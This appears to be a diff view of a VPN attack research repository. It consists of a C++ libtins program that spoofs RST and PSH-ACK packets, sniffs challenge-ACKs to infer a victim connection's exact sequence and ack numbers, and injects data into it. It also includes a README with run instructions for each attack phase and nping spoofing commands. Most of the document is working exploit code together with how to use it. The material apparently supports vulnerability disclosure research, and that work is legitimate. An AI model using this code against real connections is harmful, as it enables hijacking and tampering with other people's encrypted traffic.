curr_seq = best_seq;
cout << "best seq at end of exact scan: " << curr_seq << "\n";
print_divider(1);
is_found = rechack(curr_seq, in_win_ack, 2);
if (show) cout << "exact seq was in win after rechack? " << is_found << "\n";
}
return curr_seq;
}
// Use the fact the client will respond to empty PSH-ACKs
// that have an in window sequence number AND ack number less than the
// ack number in use with chall-acks to infer an in-window ack number
//
long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
// Loop over ack space sending empty push-acks
// that user the in window sequence number found before
//
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::PSH, 1);
tcp.set_flag(TCP::ACK, 1);
tcp.seq(in_win_seq);
sniffed_chack = false;
chack_count = 0;
count_chacks = true;
track_nums = true;
current_min_ack = min_ack;
long j = max_ack;
long current_ack = 0;
best_ack = 0;
while (j > min_ack && chack_count < chack_trigs) { // was && !sniffed_chack
usleep(send_delay);
tcp.ack_seq(j);
sender.send(pkt, iface);
num_sent ++;
if (verbose && show) cout << "spoofing with ack: " << j << "\n";
if (j < 100000000) { // for tiny ack range
j -= block_size / 100;
} else {
j -= block_size;
}
}
usleep(100000);
for (int i = 0; i < possible_acks.size(); i ++) {
long cack = possible_acks[i];
if (cack > current_ack) current_ack = cack;
}
cout << "best ack at end of ack scan: " << current_ack << "\n";
track_nums = false;
return current_ack;
}
// Finds the "quiet" portion of the ack range to
// start scanning and then begins to find an approx
// ack block close to the one being used
//
long quack_spread(long in_win_seq) {
cout << "starting quack spread w seq: " << in_win_seq << "\n";
long start_ack_guess = 4294967294 / 2;
long end_ack_guess = 100;
long block_size = 100000000;
sniffed_chack = false; // assume its gonna find an ack here first
// if the actual ack is less than half of the max_ack allowed,
// then it will consider acks at the very top end of the ack space (~429.....)
// to be less than that small ack. therefore, we check if the max ack
// triggers chacks right away, if so then we half the start_ack guess (~214....)
bool triggering = rechack(in_win_seq, start_ack_guess, 3);
cout << "is ack in upper half? " << triggering << "\n";
if (triggering) { // then we know the ack is in the lower half of the ack space
start_ack_guess = start_ack_guess * 2;
}
long j = start_ack_guess;
sniffed_chack = false;
print_divider(1);
// Now continually decrement ack until we trigger another chack
//
int send_delay = 75000;
bool is_found = false;
long current_ack = 0;
while (!is_found) {
current_ack = find_ack_block(start_ack_guess, 0, in_win_seq, block_size, send_delay, true, 1);
cout << "finished quiet block spread, guessed quiet block ack: " << current_ack << "\n";
print_divider(1);
// recheck and send multiple to make sure we found correct ack block
is_found = rechack(in_win_seq, current_ack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
if (!is_found) start_ack_guess = current_ack;
}
return current_ack;
}
// Use the fact the client will respond to RSTs
// with an in-window sequence number with chall-acks to
// infer an in-window seq number
//
long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) {
PacketSender sender;
NetworkInterface iface("wlp1s0");
long max_seq = top_seq;
long adder = prev_block_size * delay_mult;
cout << "starting round " << current_round << " spread at: " << (max_seq - adder) << "\n";
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::RST, 1);
long i;
for (i = (max_seq - adder); i < max_seq; i += new_block_size) {
tcp.seq(i);
sender.send(pkt, iface);
num_sent ++;
usleep(send_delay);
}
cout << "finished round " << current_round << " spread, guessed in window seq: " << best_seq << "\n";
return best_seq;
}
// Attempt to sniff challenge acks while recording
// the last sequence or ack number we spoofed
//
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>();
if (ack_search) {
// keep track of the last ack num we spoofed
if (ip.src_addr() == remote_addr) current_spoof_ack = some_pdu.rfind_pdu<TCP>().ack_seq();
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << payload << "\n";
if (payload == 79) { // each triggered chall-ack is 79 length SSL vs ovpn and ubuntu 19
if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n";
if (count_chacks) chack_count += 1;
if (track_nums) possible_acks.push_back(current_spoof_ack);
if (current_spoof_ack > current_min_ack) best_ack = current_spoof_ack;
sniffed_chack = true;
}
}
} else if (sniff_request == 1) {
// sniffing for a certain client request size (last step after finding seq and ack)
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
cout << "sniffed cli request of size " << payload << "\n";
if (payload == request_size) {
sniff_request = 2;
}
}
} else { // sniffing for chack during sequence search
// keep track of the last sequence num we spoofed
if (ip.src_addr() == remote_addr) current_spoof_seq = some_pdu.rfind_pdu<TCP>().seq();
if (ip.src_addr() == victim_wlan_addr) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << payload << "\n";
const int remainder = payload % 67;
if (payload == 79) {
if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n";
if (track_nums) {
best_seq = current_spoof_seq;
possible_seqs.push_back(current_spoof_seq);
} else if (count_chacks) { //
chack_count += 1;
best_seq = current_spoof_seq;
} else {
if (!sniffed_chack) {
if (best_seq == 0) { // still in initial seq spread
best_seq = current_spoof_seq;
sniffed_chack = true;
} else {
// make sure new seq is less than the previous sniffed one
if (current_spoof_seq < best_seq) {
best_seq = current_spoof_seq;
sniffed_chack = true;
}
}
}
}
}
}
}
return true;
}
void sniff_stuff() {
SnifferConfiguration config;
config.set_promisc_mode(true);
Sniffer sniffer("wlp1s0", config);
sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack
}
// Try to find an in window sequence number using
// one of the very rough estimates found in the first
// sequence spread
long try_seq_block(long current_seq) {
// Just did round 1 spoofing fast to get rough estimate of
// in window sequence number, now we send a round 2 and 3 spreads
// using the approximated seq with lower send rates
current_round = 2;
sniffed_chack = false;
int wait_count = 0;
best_seq = current_seq;
usleep(1000000 / 2);
// this will take into account the last block size of 50k,
// skip in blocks of 1055 seq nums per send, assume the last
// rounds delay was 80 packets for a response, and send every 150 msecs
long s1 = find_seq_block(50000, 1055, 80, 150, current_seq);
while (best_seq == current_seq) {
usleep(500000);
if (show) cout << "waiting on round 2 chack..\n"; // return -1 if waiting too long
wait_count +=1;
if (wait_count > 5) return -1;
}
// Now we should have a close estimate to an in-window seq
// so next do a third scan at much slower rate to ensure its
// an in-window sequence num
print_divider(1);
usleep(1000000 / 2);
sniffed_chack = false;
current_round += 1;
current_seq = best_seq;
wait_count = 0;
long s2 = find_seq_block(1055, 20, 50, 600, current_seq); // for browser went from 300 to 600
while (best_seq == current_seq) {
usleep(500000);
if (show) cout << "waiting on round 3 chack..\n";
wait_count +=1;
if (wait_count > 5) return -1;
}
return best_seq - 10000; // subtract 10k for wifi delay
}
// Gets rough estimate of sequence number in use
// by spreading entire sequence range quicly then
// tries to find in win sequence using each
//
long find_in_win_seq() {
PacketSender sender;
NetworkInterface iface("wlp1s0");
long start_seq_guess = 1;
long max_seq_num = 4294967295;
track_nums = true; // phase 1 is so fast it sniffs false seq nums so we try each
cout << "spreading the connections entire sequence number range...\n";
usleep(1000000 / 2);
EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport);
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.set_flag(TCP::RST, 1);
long i;
for (i = start_seq_guess; i < max_seq_num; i += 50000) { // sends to the whole sequence num space
tcp.seq(i);
sender.send(pkt, iface);
num_sent ++;
usleep(10);
}
usleep(1000000);
cout << "finished round 1 spread, guessed in window seq: " << best_seq << "\n";
track_nums = false;
int j = 0;
long in_win_seq = -1;
while (j < possible_seqs.size() && in_win_seq == -1) { // try each possible seq block
print_divider(1);
current_round = 0;
if (show) cout << "trying to find in window seq around " << possible_seqs[j] << "\n";
in_win_seq = try_seq_block(possible_seqs[j]);
j ++;
if (show) cout << "in win seq after try? " << in_win_seq << "\n";
usleep(1000000 / 2);
}
possible_seqs.clear();
track_nums = false;
print_divider(1);
usleep(1000000 / 2);
return best_seq;
}
// Send two spoof rounds while increasing the send delay and
// decreasing block size to quickly get in-win ack estimate
//
long find_in_win_ack(long in_win_seq) {
// quack should be below current ack in use but we only rechack once first round
ack_search = true;
long quack = quack_spread(in_win_seq);
// Spoof empty PSH-ACKs starting at 'quack' plus some send delay
// until we sniff a chack and know we just went below the left
// edge of the ack window
usleep(1000000);
print_divider(1);
possible_acks.clear();
long block_size = 10000;
int send_delay = 500;
long max_ack = quack + (1 * 100000000);
long min_ack = quack;
long clack;
bool is_found = false;
while (!is_found) { // retry ack scan until we find block triggering chacks
cout << "starting round 1 ack scan w min: " << min_ack << " and max: " << max_ack << "\n";
clack = find_ack_block(max_ack, min_ack, in_win_seq, block_size, send_delay, false, 2);
is_found = rechack(in_win_seq, clack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
int i = 0;
while (!is_found && i < possible_acks.size()) {
long some_ack = possible_acks[i];
if (show) cout << "finished ack scan 1 w possible in window ack: " << some_ack << "\n";
print_divider(1);
is_found = rechack(in_win_seq, some_ack, 2);
if (show) cout << "was in win after rechack? " << is_found << "\n";
i ++;
if (is_found) clack = some_ack;
}
max_ack = clack;
}
possible_acks.clear();
usleep(1000);
// clack should be an in window ack so now we have both in window
// sequence and in window ack numbers.
//
ack_search = false;
track_nums = false;
// clack has been consistently within 40k of next ack while testing but
// in practical use it needs to be less than the expected ack by at most
// 20k to be accepted as a valid ack, so here we add 20k to counter our delay
// but we could add a third ack scan to make it more accurate
//
long in_win_ack = clack + 30000; // adding extra 30k for wifi delay
return in_win_ack;
}
// After we've found exact seq and in-win ack, attacker waits
// for a specific request size to inject the response into
//
int wait_for_request(long exact_seq, long in_win_ack) {
sniff_request = 1;
int res = 0;
while (sniff_request != 2) {
usleep(500000);
if (show) cout << "waiting for request of size..\n";
}
if(show) cout << "Sniffed request packet to respond to\n";
res = inject_junk(exact_seq, in_win_ack);
return res;
}
// Attempt to infer the exact sequence number
// and in-window ack in use by the connection
//
int phase_three_spread() {
bool is_found = false;
long in_win_seq = 0;
// Loop until we find in window seq
while (!is_found) {
in_win_seq = find_in_win_seq();
print_divider(1);
is_found = rechack(in_win_seq, 0, 2);
cout << "approx seq: " << in_win_seq << " was in win after rechack? " << is_found << "\n";
if (!is_found) usleep(1000000 / 2);
}
// At this point we should have an in-window sequence number and
// next step is to find an in-window ack number for the connection
//
usleep(1000000 / 2);
long in_win_ack = find_in_win_ack(in_win_seq);
in_win_ack += 40000; // add 40k for wifi delay
cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n";
// jump back 40 for wifi delay
long exact_seq = find_exact_seq(in_win_seq - 40, in_win_ack, 100000) + 1; // should be one less than left edge
cout << "final exact seq guess: " << exact_seq << "\n";
cout << "total number of packets sent: " << num_sent << "\n";
print_divider(2);
int res = 0;
if (testing) { // for netcat
res = inject_junk(exact_seq, in_win_ack);
} else { // for normal http injection
cout << "waiting for client to request any page within inferred connection...";
res = wait_for_request(exact_seq, in_win_ack);
}
return res;
}
int main(int argc, char** argv) {
if (argc != 8) {
cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size)\n";
return 0;
}
remote_addr = argv[1];
sport = atoi(argv[2]);
victim_wlan_addr = argv[3];
dest_ip = argv[4];
dest_mac = argv[5];
dport = atoi(argv[6]);
request_size = atoi(argv[7]);
thread sniff_thread(sniff_stuff);
print_divider(2);
int r = phase_three_spread();
sniff_thread.detach();
//sniff_thread.join();
return 0;
}

BIN
demos/fb-mitm-firefox.mp4

BIN
demos/nsl-brack.mp4

BIN
demos/wa-jack.mov

83
old-readme

@ -0,0 +1,83 @@
# VeepExploit
The current version of VPN attack code
##### Attack Machine Environment
* C++
* libtins (http://libtins.github.io/download/)
## Server-side attack
#### Requirements
* VPN client connected to a VPN server
* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two
***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder
#### Running the DNS Attack Script
1. Change to udp-dns attack folder - `cd other-end-attack/dnuss/full_scan`
2. Compile attack script - `make`
3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp`
3. Try to inject from attack router - `sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>`
## Client-side attack
#### Requirements
* VPN client connected to a VPN server
* Reverse path filtering disabled on the VPN client machine
* Attack router acting as the local network gateway for the victim (VPN client) machine
#### Running the Full Attack Script
* Rebuild all the attack scripts: `./rebuild_all.sh`
* `cd full_attack`
* Change `attack.sh` vars to appropriate values
* `sh attack.sh <remote_ip>`
***Note:*** `remote_ip` specifies the IP address of the HTTP site.
#### Testing Indivual attack phases
##### Phase 1 - Infer victim's private address
* `cd first_phase`
* `python3 send.py <victim_public_ip> <private_ip_range>`
***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`.
##### Phase 2 - Infer the port being used to talk to some remote address
* `cd sec_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>`
***Note:*** `<remote_ip>` is the address we wanna check if the client is connected to and the `<remote_port>` is almost always 80 or 443. The `<victim_wlan_ip>` is the public address of the victim and `<victim_priv_ip>` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system.
##### Phase 3 - Infer exact sequence number and in-window ack
* `cd third_phase`
* Edit `send.cpp` to use the correct MAC addresses
* `g++ send.cpp -o send -ltins`
* `./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>`
***Note:*** `<victim_port>` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified.

BIN
pcaps/client-side-caps/nping-examples/.setup.txt.swp

BIN
pcaps/client-side-caps/nping-examples/attacker/phase2_nping_attacker.pcap

BIN
pcaps/client-side-caps/nping-examples/attacker/phase3_nping_attacker.pcap

28
pcaps/client-side-caps/nping-examples/setup.txt

@ -0,0 +1,28 @@
Nping pcap commands during each phase:
On attacker machine: `sudo tcpdump -i wlp1s0 -nnvvS not src port 22 and not dst port 22 -w wash_attacker.pcap`
On victim macine: `sudo tcpdump -i any -nnvvS not src port 22 and not dst port 22 -w vic_any_capture_wash.pcap`
Attacker commands
Phase 2: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags SA -p 40402`
Phase 3: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags R -p 40404 --seq 4253820601`
Addresses in netcat example:
Phase 2 pcap: --> (netcat 172.217.12.14 80